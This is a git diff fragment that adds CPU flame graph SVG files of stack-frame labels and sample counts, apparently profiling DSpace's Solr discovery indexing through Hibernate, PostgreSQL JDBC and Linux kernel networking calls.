+ + +rcu_gp_kthread_wake (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingResultSet:::getInt (1 samples, 0.09%) + + + +ip_rcv (1 samples, 0.09%) + + + +tcp_event_data_recv (1 samples, 0.09%) + + + +psi_task_change (1 samples, 0.09%) + + + +nf_hook_slow (1 samples, 0.09%) + + + +java/lang/AbstractStringBuilder:::append (1 samples, 0.09%) + + + +org/apache/http/protocol/BasicHttpContext:::setAttribute (1 samples, 0.09%) + + + +org/dspace/sort/OrderFormat:::makeSortString (4 samples, 0.36%) + + + +[libjvm.so] (4 samples, 0.36%) + + + +sk_filter_trim_cap (2 samples, 0.18%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +sun/reflect/NativeMethodAccessorImpl:::invoke0 (747 samples, 68.03%) +sun/reflect/NativeMethodAccessorImpl:::invoke0 + + +java/lang/String:::equals (1 samples, 0.09%) + + + +java/util/regex/Pattern$LastNode:::match (1 samples, 0.09%) + + + +org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::populateBean (2 samples, 0.18%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%) + + + +tcp_rcv_state_process (1 samples, 0.09%) + + + +[libjvm.so] (747 samples, 68.03%) +[libjvm.so] + + +[libjvm.so] (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%) + + + +entry_SYSCALL_64_after_hwframe (3 samples, 0.27%) + + + +org/apache/http/entity/mime/content/StringBody:::<init> (6 samples, 0.55%) + + + +java/net/SocketOutputStream:::socketWrite0 (1 samples, 0.09%) + + + +_register_finalizer_Java (2 samples, 0.18%) + + + +scheduler_tick (1 samples, 0.09%) + + + +__wake_up_common (21 samples, 1.91%) +_.. + + +handle_irq_event (1 samples, 0.09%) + + + +[libjvm.so] (7 samples, 0.64%) + + + +_IO_default_xsputn (1 samples, 0.09%) + + + +org/apache/solr/client/solrj/request/RequestWriter$LazyContentStream:::getStream (7 samples, 0.64%) + + + +java/util/regex/Pattern$5:::isSatisfiedBy (2 samples, 0.18%) + + + +__wake_up_bit (1 samples, 0.09%) + + + +JVM_InvokeMethod (747 samples, 68.03%) +JVM_InvokeMethod + + +release_sock (1 samples, 0.09%) + + + +__tcp_send_ack.part.0 (1 samples, 0.09%) + + + +java/util/regex/Pattern$CharProperty:::study (3 samples, 0.27%) + + + +hrtimer_interrupt (1 samples, 0.09%) + + + +schedule_hrtimeout_range_clock (6 samples, 0.55%) + + + +nft_lookup_eval (1 samples, 0.09%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.09%) + + + +acpi_os_read_port (1 samples, 0.09%) + + + +pick_next_task_fair (1 samples, 0.09%) + + + +entry_SYSCALL_64_after_hwframe (1 samples, 0.09%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::execute (38 samples, 3.46%) +org.. + + +ip_local_out (1 samples, 0.09%) + + + +tcp_push (1 samples, 0.09%) + + + +__ip_queue_xmit (1 samples, 0.09%) + + + +smp_apic_timer_interrupt (1 samples, 0.09%) + + + +do_sys_poll (3 samples, 0.27%) + + + +wake_bit_function (1 samples, 0.09%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (4 samples, 0.36%) + + + +[libjvm.so] (5 samples, 0.46%) + + + +finish_task_switch (61 samples, 5.56%) +finish_.. 
+ + +org/dspace/browse/BrowseIndex:::generateMdBits (2 samples, 0.18%) + + + +org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (10 samples, 0.91%) + + + +iptable_mangle_hook (1 samples, 0.09%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::handleResponse (1 samples, 0.09%) + + + +java/util/regex/Pattern$Branch:::match (2 samples, 0.18%) + + + +org/dspace/storage/rdbms/TableRow:::getBooleanColumn (1 samples, 0.09%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (5 samples, 0.46%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.09%) + + + +java/util/regex/Pattern$5:::isSatisfiedBy (2 samples, 0.18%) + + + +record_times (1 samples, 0.09%) + + + +tick_sched_handle (1 samples, 0.09%) + + + +sk_wait_data (32 samples, 2.91%) +sk.. + + +org/apache/http/entity/HttpEntityWrapper:::isChunked (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%) + + + +remove_wait_queue (1 samples, 0.09%) + + + +org/springframework/beans/support/ResourceEditorRegistrar:::registerCustomEditors (2 samples, 0.18%) + + + +kmem_cache_alloc_node (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%) + + + +org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::predictBeanType (22 samples, 2.00%) +o.. + + +ret_from_intr (1 samples, 0.09%) + + + +fput_many (1 samples, 0.09%) + + + +ip_rcv (1 samples, 0.09%) + + + +tcp_v6_connect (1 samples, 0.09%) + + + +java/net/SocketInputStream:::read (1 samples, 0.09%) + + + +org/dspace/core/Context:::<init> (7 samples, 0.64%) + + + +acpi_hw_read (1 samples, 0.09%) + + + +ip_local_out (1 samples, 0.09%) + + + +org/dspace/storage/rdbms/DatabaseManager:::loadParameters (1 samples, 0.09%) + + + +org/apache/commons/pool/impl/GenericKeyedObjectPool:::borrowObject (1 samples, 0.09%) + + + +org/postgresql/core/PGStream:::ReceiveTupleV3 (1 samples, 0.09%) + + + +__libc_connect (1 samples, 0.09%) + + + +java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%) + + + +java/util/regex/Pattern$GroupHead:::match (1 samples, 0.09%) + + + +intel_tfa_pmu_enable_all (12 samples, 1.09%) + + + +exit_to_usermode_loop (1 samples, 0.09%) + + + +java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%) + + + +__wake_up_sync_key (22 samples, 2.00%) +_.. + + +[libjvm.so] (8 samples, 0.73%) + + + +java/util/regex/Pattern$Node:::study (4 samples, 0.36%) + + + +__skb_datagram_iter (1 samples, 0.09%) + + + +java/util/HashSet:::contains (1 samples, 0.09%) + + + +finish_task_switch (1 samples, 0.09%) + + + +Interpreter (1 samples, 0.09%) + + + +intel_tfa_pmu_enable_all (60 samples, 5.46%) +intel_t.. 
+ + +run_rebalance_domains (1 samples, 0.09%) + + + +org/springframework/context/support/AbstractApplicationContext$BeanPostProcessorChecker:::postProcessAfterInitialization (1 samples, 0.09%) + + + +java/util/Formatter:::format (15 samples, 1.37%) + + + +org/apache/solr/common/SolrInputDocument:::addField (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +iptable_security_hook (1 samples, 0.09%) + + + +ext4_do_update_inode (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (4 samples, 0.36%) + + + +java/util/regex/Pattern$Begin:::match (5 samples, 0.46%) + + + +[libjvm.so] (2 samples, 0.18%) + + + +refcount_sub_and_test_checked (2 samples, 0.18%) + + + +bbr_update_model (2 samples, 0.18%) + + + +__GI___libc_open (1 samples, 0.09%) + + + +deactivate_task (1 samples, 0.09%) + + + +org/dspace/content/DSpaceObject:::getMetadata (1 samples, 0.09%) + + + +org/dspace/storage/rdbms/TableRow:::getIntColumn (1 samples, 0.09%) + + + +tcp_in_window (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (3 samples, 0.27%) + + + +java/util/regex/Pattern$CharProperty:::match (2 samples, 0.18%) + + + +org/apache/commons/dbcp/DelegatingStatement:::close (3 samples, 0.27%) + + + +nf_hook_slow (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +org/apache/commons/dbcp/PoolablePreparedStatement:::close (2 samples, 0.18%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::close (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%) + + + +iptable_mangle_hook (1 samples, 0.09%) + + + +org/apache/commons/dbcp/PoolingDataSource$PoolGuardConnectionWrapper:::prepareStatement (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%) + + + +java/util/regex/Pattern$BranchConn:::match (2 samples, 0.18%) + + + +ipv4_conntrack_in (2 samples, 0.18%) + + + +Interpreter (1 samples, 0.09%) + + + +tcp_v4_do_rcv (1 samples, 0.09%) + + + +java/lang/Class:::getEnclosingMethod0 (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (5 samples, 0.46%) + + + +tcp_v4_conn_request (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%) + + + +tcp_v4_do_rcv (41 samples, 3.73%) +tcp_.. + + +org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%) + + + +java/util/regex/Pattern$Curly:::match0 (1 samples, 0.09%) + + + +ip_local_deliver_finish (51 samples, 4.64%) +ip_lo.. 
+ + +org/dspace/storage/rdbms/DatabaseManager:::find (12 samples, 1.09%) + + + +nft_lookup_eval (1 samples, 0.09%) + + + +org/apache/commons/pool/impl/GenericObjectPool:::borrowObject (6 samples, 0.55%) + + + +irq_exit (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +java/util/HashMap:::put (2 samples, 0.18%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +org/apache/commons/dbcp/PoolingConnection$PStmtKey:::hashCode (1 samples, 0.09%) + + + +java/net/SocketInputStream:::socketRead0 (13 samples, 1.18%) + + + +run_rebalance_domains (1 samples, 0.09%) + + + +vfs_write (2 samples, 0.18%) + + + +handle_irq_event_percpu (1 samples, 0.09%) + + + +nf_conntrack_in (1 samples, 0.09%) + + + +java/util/regex/Pattern$CharProperty:::match (1 samples, 0.09%) + + + +java/util/AbstractCollection:::addAll (1 samples, 0.09%) + + + +org/springframework/core/convert/support/GenericConversionService:::addConverter (18 samples, 1.64%) + + + +ctx_sched_in (1 samples, 0.09%) + + + +org/postgresql/core/PGStream:::ReceiveTupleV3 (1 samples, 0.09%) + + + +[libjvm.so] (9 samples, 0.82%) + + + +dec_pending (1 samples, 0.09%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::execute (2 samples, 0.18%) + + + +ip_queue_xmit (137 samples, 12.48%) +ip_queue_xmit + + +org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%) + + + +acpi_os_read_port (1 samples, 0.09%) + + + +iptable_filter_hook (3 samples, 0.27%) + + + +com/atmire/dspace/discovery/AtmireSolrService:::logduration (1 samples, 0.09%) + + + +org/dspace/storage/rdbms/DatabaseManager:::loadParameters (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%) + + + +org/dspace/storage/rdbms/DatabaseManager:::find (1 samples, 0.09%) + + + +ip_protocol_deliver_rcu (1 samples, 0.09%) + + + +java/lang/AbstractStringBuilder:::append (1 samples, 0.09%) + + + +__fget (1 samples, 0.09%) + + + +acpi_ev_gpe_detect (1 samples, 0.09%) + + + +tcp_rcv_space_adjust (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +org/dspace/storage/rdbms/TableRowIterator:::hasNext (4 samples, 0.36%) + + + +java/util/regex/Pattern$GroupTail:::match (4 samples, 0.36%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::processResults (4 samples, 0.36%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (5 samples, 0.46%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::sendSync (1 samples, 0.09%) + + + +jshort_arraycopy (1 samples, 0.09%) + + + +Interpreter (1 samples, 0.09%) + + + +nf_nat_ipv4_local_fn (1 samples, 0.09%) + + + +jlong_disjoint_arraycopy (3 samples, 0.27%) + + + +org/springframework/beans/factory/support/DefaultListableBeanFactory:::getBeansOfType (114 samples, 10.38%) +org/springframe.. 
[Flame graph omitted: the lines here were the raw SVG text labels of a CPU flame graph of the `java` process (1,098 samples, 100%) taken during Solr/Discovery indexing. The recoverable summary: most time sits under `com/atmire/dspace/discovery/AtmireSolrService:::indexContent` (703 samples, 64%) and `:::buildDocument` (622 samples, 57%), with notable children `org/dspace/browse/SolrBrowseCreateDAO:::additionalIndex` (110 samples, 10%), `org/dspace/servicemanager/DSpaceServiceManager:::getServicesByType` (115 samples, 10%), PostgreSQL JDBC `executeQuery` calls, and TCP sends to Solr (`__send`, 213 samples, 19%).]
+ + +kfree_skbmem (1 samples, 0.09%) + + + +java/util/regex/Pattern:::group0 (6 samples, 0.55%) + + + +java/lang/ref/Finalizer:::register (1 samples, 0.09%) + + + +org/apache/http/message/BasicHeaderValueParser:::parseNameValuePair (1 samples, 0.09%) + + + +nft_do_chain_inet (1 samples, 0.09%) + + + +end_bio_bh_io_sync (1 samples, 0.09%) + + + +java/lang/String:::split (2 samples, 0.18%) + + + +org/dspace/servicemanager/config/DSpaceConfigurationService:::getPropertyAsType (95 samples, 8.65%) +org/dspace/s.. + + +org/springframework/beans/propertyeditors/CustomMapEditor:::<init> (1 samples, 0.09%) + + + +visit_groups_merge (1 samples, 0.09%) + + + +org/postgresql/core/PGStream:::Receive (1 samples, 0.09%) + + + +nft_ct_get_eval (1 samples, 0.09%) + + + +org/dspace/storage/rdbms/DatabaseManager:::getColumnNames (1 samples, 0.09%) + + + +acpi_ev_gpe_detect (1 samples, 0.09%) + + + +java/io/FileOutputStream:::write (3 samples, 0.27%) + + + +__intel_pmu_enable_all.constprop.0 (12 samples, 1.09%) + + + +ext4_getblk (1 samples, 0.09%) + + + +java/util/ArrayList$SubList$1:::hasNext (1 samples, 0.09%) + + + +org/apache/solr/common/util/JavaBinCodec:::readVal (1 samples, 0.09%) + + + +x86_pmu_enable (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +strncpy (3 samples, 0.27%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::execute (3 samples, 0.27%) + + + +skb_release_all (1 samples, 0.09%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::processResults (5 samples, 0.46%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.09%) + + + +memcmp (1 samples, 0.09%) + + + +file_update_time (2 samples, 0.18%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (27 samples, 2.46%) +or.. + + +org/dspace/discovery/SearchUtils:::getAllDiscoveryConfigurations (7 samples, 0.64%) + + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::receiveResponseEntity (3 samples, 0.27%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%) + + + +rb_next (1 samples, 0.09%) + + + +__x64_sys_shutdown (1 samples, 0.09%) + + + +ret_from_intr (1 samples, 0.09%) + + + +java/security/AccessController:::doPrivileged (27 samples, 2.46%) +ja.. + + +update_rq_clock (1 samples, 0.09%) + + + +wait_woken (31 samples, 2.82%) +wa.. + + +org/apache/commons/pool/impl/GenericKeyedObjectPool:::borrowObject (1 samples, 0.09%) + + + +sched_clock (1 samples, 0.09%) + + + +handle_fasteoi_irq (1 samples, 0.09%) + + + +org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::doCreateBean (36 samples, 3.28%) +org.. + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (2 samples, 0.18%) + + + +JNU_ThrowByName (1 samples, 0.09%) + + + +org/apache/http/client/methods/HttpPost:::<init> (1 samples, 0.09%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::sendSync (1 samples, 0.09%) + + + +JVM_GetStackTraceElement (5 samples, 0.46%) + + + +ext4_bread_batch (1 samples, 0.09%) + + + + diff --git a/docs/2020/02/out.dspace64-3.svg b/docs/2020/02/out.dspace64-3.svg new file mode 100644 index 000000000..16d38c48a --- /dev/null +++ b/docs/2020/02/out.dspace64-3.svg @@ -0,0 +1,4996 @@ + + + + + + + + + + + + + + +Flame Graph + +Reset Zoom +Search +ic + + + +Java_java_net_SocketOutputStream_socketWrite0 (1 samples, 0.08%) + + + +ip_local_out (24 samples, 1.90%) +i.. 
+ + +__wake_up_common (1 samples, 0.08%) + + + +org/dspace/discovery/FullTextContentStreams:::<init> (4 samples, 0.32%) + + + +org/apache/commons/configuration/tree/DefaultExpressionEngine:::processSubNodes (1 samples, 0.08%) + + + +apic_timer_interrupt (1 samples, 0.08%) + + + +__perf_event_task_sched_in (12 samples, 0.95%) + + + +java/util/regex/Pattern:::sequence (1 samples, 0.08%) + + + +sock_sendmsg (33 samples, 2.62%) +so.. + + +Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +jshort_disjoint_arraycopy (1 samples, 0.08%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::wasInitialized (1 samples, 0.08%) + + + +smp_apic_timer_interrupt (2 samples, 0.16%) + + + +org/hibernate/proxy/pojo/javassist/JavassistLazyInitializer:::invoke (4 samples, 0.32%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::flushCollections (10 samples, 0.79%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (74 samples, 5.87%) +org/hib.. + + +org/hibernate/event/internal/WrapVisitor:::processValue (6 samples, 0.48%) + + + +JVM_IHashCode (10 samples, 0.79%) + + + +org/dspace/app/util/DailyFileAppender:::subAppend (2 samples, 0.16%) + + + +sun/reflect/UnsafeObjectFieldAccessorImpl:::get (3 samples, 0.24%) + + + +smp_apic_timer_interrupt (1 samples, 0.08%) + + + +java/util/regex/Pattern:::atom (1 samples, 0.08%) + + + +org/hibernate/internal/util/collections/IdentityMap:::entryArray (5 samples, 0.40%) + + + +tcp_rcv_established (2 samples, 0.16%) + + + +org/apache/http/entity/InputStreamEntity:::writeTo (1 samples, 0.08%) + + + +java/lang/String:::<init> (1 samples, 0.08%) + + + +schedule (12 samples, 0.95%) + + + +org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (10 samples, 0.79%) + + + +org/hibernate/engine/spi/CollectionEntry:::getOrphans (9 samples, 0.71%) + + + +java/util/AbstractMap:::get (3 samples, 0.24%) + + + +itable stub (5 samples, 0.40%) + + + +futex_wait_queue_me (4 samples, 0.32%) + + + +inet6_recvmsg (23 samples, 1.83%) +i.. 
+ + +org/hibernate/type/EntityType:::nullSafeGet (1 samples, 0.08%) + + + +event_sched_in.isra.0 (1 samples, 0.08%) + + + +Java_java_lang_Throwable_fillInStackTrace (1 samples, 0.08%) + + + +ip_protocol_deliver_rcu (3 samples, 0.24%) + + + +org/apache/http/impl/conn/DefaultHttpResponseParser:::parseHead (1 samples, 0.08%) + + + +nft_do_chain_inet (9 samples, 0.71%) + + + +org/apache/http/protocol/HttpRequestExecutor:::preProcess (1 samples, 0.08%) + + + +exit_to_usermode_loop (2 samples, 0.16%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::hasQueuedOperations (1 samples, 0.08%) + + + +java/net/SocketInputStream:::socketRead0 (1 samples, 0.08%) + + + +org/hibernate/type/AbstractStandardBasicType:::isComponentType (1 samples, 0.08%) + + + +entry_SYSCALL_64_after_hwframe (4 samples, 0.32%) + + + +perf_event_sched_in (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +org/hibernate/type/AbstractType:::isCollectionType (1 samples, 0.08%) + + + +__sched_text_start (2 samples, 0.16%) + + + +org/apache/commons/configuration/HierarchicalConfiguration:::getProperty (3 samples, 0.24%) + + + +java/util/ArrayList:::<init> (1 samples, 0.08%) + + + +sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.08%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (20 samples, 1.59%) + + + +org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (1 samples, 0.08%) + + + +ip_local_deliver_finish (3 samples, 0.24%) + + + +futex_wait (50 samples, 3.97%) +fute.. + + +org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (3 samples, 0.24%) + + + +org/apache/http/protocol/HttpRequestExecutor:::doSendRequest (1 samples, 0.08%) + + + +org/apache/http/impl/AbstractHttpClientConnection:::sendRequestEntity (1 samples, 0.08%) + + + +do_syscall_64 (23 samples, 1.83%) +d.. + + +org/hibernate/type/ManyToOneType:::isDirty (1 samples, 0.08%) + + + +org/apache/http/protocol/HttpRequestExecutor:::doReceiveResponse (1 samples, 0.08%) + + + +java/util/regex/Pattern$BmpCharProperty:::match (1 samples, 0.08%) + + + +vtable stub (1 samples, 0.08%) + + + +java/util/regex/Pattern$Curly:::match (1 samples, 0.08%) + + + +sun/reflect/UnsafeQualifiedObjectFieldAccessorImpl:::get (1 samples, 0.08%) + + + +org/dspace/util/MultiFormatDateParser:::parse (2 samples, 0.16%) + + + +org/hibernate/proxy/pojo/javassist/JavassistLazyInitializer:::invoke (1 samples, 0.08%) + + + +org/apache/http/pool/RouteSpecificPool:::getFree (1 samples, 0.08%) + + + +[libjvm.so] (2 samples, 0.16%) + + + +update_sd_lb_stats (1 samples, 0.08%) + + + +Java_java_lang_Throwable_fillInStackTrace (1 samples, 0.08%) + + + +org/hibernate/engine/internal/TwoPhaseLoad:::doInitializeEntity (1 samples, 0.08%) + + + +org/apache/commons/configuration/AbstractConfiguration:::getBoolean (4 samples, 0.32%) + + + +org/apache/http/impl/AbstractHttpClientConnection:::sendRequestEntity (10 samples, 0.79%) + + + +org/hibernate/internal/util/collections/IdentityMap:::entryArray (8 samples, 0.63%) + + + +JVM_FillInStackTrace (1 samples, 0.08%) + + + +org/apache/solr/common/params/ModifiableSolrParams:::set (1 samples, 0.08%) + + + +org/hibernate/engine/internal/StatefulPersistenceContext:::removeEntry (1 samples, 0.08%) + + + +java/io/InputStream:::read (1 samples, 0.08%) + + + +inet6_sendmsg (32 samples, 2.54%) +in.. 
+ + +org/hibernate/loader/Loader:::loadCollection (1 samples, 0.08%) + + + +org/dspace/discovery/SolrServiceContentInOriginalBundleFilterPlugin:::hasOriginalBundleWithContent (4 samples, 0.32%) + + + +sun/reflect/GeneratedMethodAccessor23:::invoke (2 samples, 0.16%) + + + +org/dspace/services/factory/DSpaceServicesFactory:::getInstance (1 samples, 0.08%) + + + +tick_sched_timer (1 samples, 0.08%) + + + +org/hibernate/type/CollectionType:::isDirty (1 samples, 0.08%) + + + +org/dspace/discovery/FullTextContentStreams:::buildFullTextList (4 samples, 0.32%) + + + +org/hibernate/event/internal/DefaultLoadEventListener:::doLoad (3 samples, 0.24%) + + + +itable stub (9 samples, 0.71%) + + + +org/hibernate/type/CollectionType:::isDirty (5 samples, 0.40%) + + + +org/hibernate/loader/AbstractEntityJoinWalker:::initAll (5 samples, 0.40%) + + + +org/dspace/content/ItemServiceImpl:::getCommunities (2 samples, 0.16%) + + + +Interpreter (1,118 samples, 88.73%) +Interpreter + + +[libjvm.so] (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +itable stub (4 samples, 0.32%) + + + +_new_instance_Java (1 samples, 0.08%) + + + +org/apache/commons/configuration/tree/DefaultExpressionEngine:::findNodesForKey (2 samples, 0.16%) + + + +ip_queue_xmit (24 samples, 1.90%) +i.. + + +nf_conntrack_tcp_packet (1 samples, 0.08%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::setOwner (1 samples, 0.08%) + + + +__ip_local_out (5 samples, 0.40%) + + + +java/util/HashSet:::add (15 samples, 1.19%) + + + +acpi_irq (1 samples, 0.08%) + + + +org/hibernate/event/internal/DefaultAutoFlushEventListener:::onAutoFlush (142 samples, 11.27%) +org/hibernate/ev.. + + +java/util/HashSet:::add (3 samples, 0.24%) + + + +try_to_wake_up (1 samples, 0.08%) + + + +org/jboss/logging/Log4jLogger:::isEnabled (1 samples, 0.08%) + + + +nft_do_chain (9 samples, 0.71%) + + + +org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.08%) + + + +[libjvm.so] (10 samples, 0.79%) + + + +org/hibernate/loader/OuterJoinableAssociation:::addJoins (1 samples, 0.08%) + + + +[libjvm.so] (2 samples, 0.16%) + + + +java/util/AbstractMap:::get (1 samples, 0.08%) + + + +org/hibernate/loader/Loader:::initializeEntitiesAndCollections (3 samples, 0.24%) + + + +java/util/ArrayList$Itr:::next (1 samples, 0.08%) + + + +org/apache/http/protocol/HttpRequestExecutor:::preProcess (3 samples, 0.24%) + + + +org/dspace/content/Bitstream:::getName (1 samples, 0.08%) + + + +org/hibernate/loader/Loader:::initializeEntitiesAndCollections (1 samples, 0.08%) + + + +sun/reflect/UnsafeIntegerFieldAccessorImpl:::get (1 samples, 0.08%) + + + +org/hibernate/type/AbstractStandardBasicType:::isCollectionType (1 samples, 0.08%) + + + +Interpreter (1,118 samples, 88.73%) +Interpreter + + +org/hibernate/persister/entity/AbstractEntityPersister:::selectFragment (1 samples, 0.08%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (99 samples, 7.86%) +org/hiberna.. 
+ + +org/springframework/beans/factory/support/DefaultListableBeanFactory:::getBeansOfType (4 samples, 0.32%) + + + +org/hibernate/engine/internal/EntityEntryContext:::reentrantSafeEntityEntries (4 samples, 0.32%) + + + +__netif_receive_skb_core (1 samples, 0.08%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::handleResponse (1 samples, 0.08%) + + + +tick_sched_timer (1 samples, 0.08%) + + + +org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (20 samples, 1.59%) + + + +org/dspace/browse/BrowseIndex:::<init> (3 samples, 0.24%) + + + +org/apache/log4j/AppenderSkeleton:::doAppend (1 samples, 0.08%) + + + +java/util/AbstractMap:::get (1 samples, 0.08%) + + + +java/lang/Integer:::equals (1 samples, 0.08%) + + + +__send (36 samples, 2.86%) +__.. + + +sun/reflect/UnsafeQualifiedObjectFieldAccessorImpl:::get (1 samples, 0.08%) + + + +tcp_options_write (1 samples, 0.08%) + + + +itable stub (1 samples, 0.08%) + + + +org/hibernate/engine/jdbc/internal/ResultSetReturnImpl:::extract (3 samples, 0.24%) + + + +org/hibernate/engine/jdbc/internal/StatementPreparerImpl$StatementPreparationTemplate:::prepareStatement (1 samples, 0.08%) + + + +org/hibernate/type/CollectionType:::isCollectionType (3 samples, 0.24%) + + + +__pthread_getspecific (1 samples, 0.08%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (2 samples, 0.16%) + + + +org/postgresql/jdbc/PgStatement:::executeInternal (3 samples, 0.24%) + + + +org/hibernate/type/CollectionType:::hasHolder (1 samples, 0.08%) + + + +[libjvm.so] (1,118 samples, 88.73%) +[libjvm.so] + + +java/util/ArrayList:::iterator (1 samples, 0.08%) + + + +org/hibernate/persister/entity/AbstractEntityPersister:::toColumns (1 samples, 0.08%) + + + +org/apache/http/entity/mime/MultipartEntity:::writeTo (1 samples, 0.08%) + + + +iptable_filter_hook (1 samples, 0.08%) + + + +java/lang/Object:::hashCode (8 samples, 0.63%) + + + +org/hibernate/type/CollectionType:::isDirty (12 samples, 0.95%) + + + +__x64_sys_recvfrom (23 samples, 1.83%) +_.. + + +org/hibernate/type/AbstractType:::isCollectionType (2 samples, 0.16%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +org/apache/solr/common/SolrInputDocument:::addField (2 samples, 0.16%) + + + +pthread_cond_wait@@GLIBC_2.3.2 (50 samples, 3.97%) +pthr.. + + +__sys_recvfrom (23 samples, 1.83%) +_.. + + +__sched_text_start (50 samples, 3.97%) +__sc.. + + +org/hibernate/event/internal/FlushVisitor:::processCollection (22 samples, 1.75%) + + + +org/dspace/servicemanager/spring/DSpaceBeanPostProcessor:::postProcessBeforeInitialization (3 samples, 0.24%) + + + +do_softirq_own_stack (17 samples, 1.35%) + + + +org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::resolveBeforeInstantiation (1 samples, 0.08%) + + + +itable stub (1 samples, 0.08%) + + + +smp_apic_timer_interrupt (1 samples, 0.08%) + + + +org/hibernate/persister/entity/AbstractEntityPersister:::hydrate (1 samples, 0.08%) + + + +irq_exit (1 samples, 0.08%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (97 samples, 7.70%) +org/hibern.. 
+ + +__dev_queue_xmit (1 samples, 0.08%) + + + +org/dspace/eperson/Group_$$_jvst437_1e:::getHibernateLazyInitializer (1 samples, 0.08%) + + + +__netif_receive_skb (15 samples, 1.19%) + + + +org/hibernate/internal/IteratorImpl:::next (1 samples, 0.08%) + + + +update_blocked_averages (2 samples, 0.16%) + + + +java/lang/Object:::hashCode (2 samples, 0.16%) + + + +[libjvm.so] (1 samples, 0.08%) + + + +java/util/HashMap:::resize (1 samples, 0.08%) + + + +org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (3 samples, 0.24%) + + + +tick_sched_handle (1 samples, 0.08%) + + + +org/apache/http/entity/HttpEntityWrapper:::isChunked (1 samples, 0.08%) + + + +org/hibernate/internal/util/collections/IdentityMap:::entryArray (2 samples, 0.16%) + + + +org/springframework/beans/factory/support/AbstractBeanFactory:::doGetBean (3 samples, 0.24%) + + + +org/apache/commons/configuration/MapConfiguration$1:::entrySet (1 samples, 0.08%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::request (9 samples, 0.71%) + + + 